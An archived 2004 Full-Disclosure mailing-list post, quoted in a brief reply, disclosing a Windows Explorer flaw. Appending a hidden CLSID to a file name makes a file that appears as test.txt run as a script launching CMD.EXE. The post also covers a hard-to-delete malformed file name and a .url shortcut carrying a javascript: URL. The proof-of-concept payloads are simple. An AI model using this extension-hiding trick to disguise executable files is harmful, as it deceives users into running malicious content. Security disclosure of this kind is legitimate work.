lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: jkuperus at planet.nl (Jelmer)
Subject: Microsoft hides certain types of files from your
 eyes + some filename parsing bug

Ancient news

http://www.guninski.com/clsidext.html


--jelmer


-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Good One
Sent: donderdag 8 juli 2004 1:37
To: full-disclosure@...ts.netsys.com
Subject: [Full-Disclosure] Microsoft hides certain types of files from your
eyes + some filename parsing bug

Microsoft HIDES certain types of files from your eyes:
?
This one is old unpatched "behaviour" ...
?
If you will create in windows explorer file :
?
test.txt?
with content :
?
<script>
a=new ActiveXObject("WSCript.Shell");
a.run("CMD.EXE");
alert("Hello, I'm?Silly Billy?!");
</script>
?
It will be executed if you will add CLSID to it's name and user double
clicks it :
?
test.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
?
Note: 
CLSID will remain hidden (explorer will not show it up in any means)
File name for?user will remain : test.txt
?
This adds numerous possibilities for viruses to fool end user into safe
content.
?
?
another filename parsing bug (system even?cannot access it) :
By some technics windows still allows to write file on harddisk with funny
name like :
?
test [good one :] .avi
?
End user will expierence certain difficulties to remove it afterwards from
system.
?
It's name will change to "test [good one", it will have no extension, will
show up 0 bytes etc, etc...
?
?
Of course .url and .lnk?are hidden as well, being "shortcuts" in m$ way. The
contents of those files are up to you ... :-) 
?
For example :?file "test.url" with this content will open your browser with
alert.
?
[DEFAULT]
BASEURL=javascript:alert('hello mama !')
[InternetShortcut]
URL=javascript:alert('hello mama !')
Modified=00027F010505010100
?
?
m$ is good for gaming, not for serious work..
?
?
- SomeMan.
?

ALL-NEW Yahoo! Messenger - sooooo many all-new ways to express yourself

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ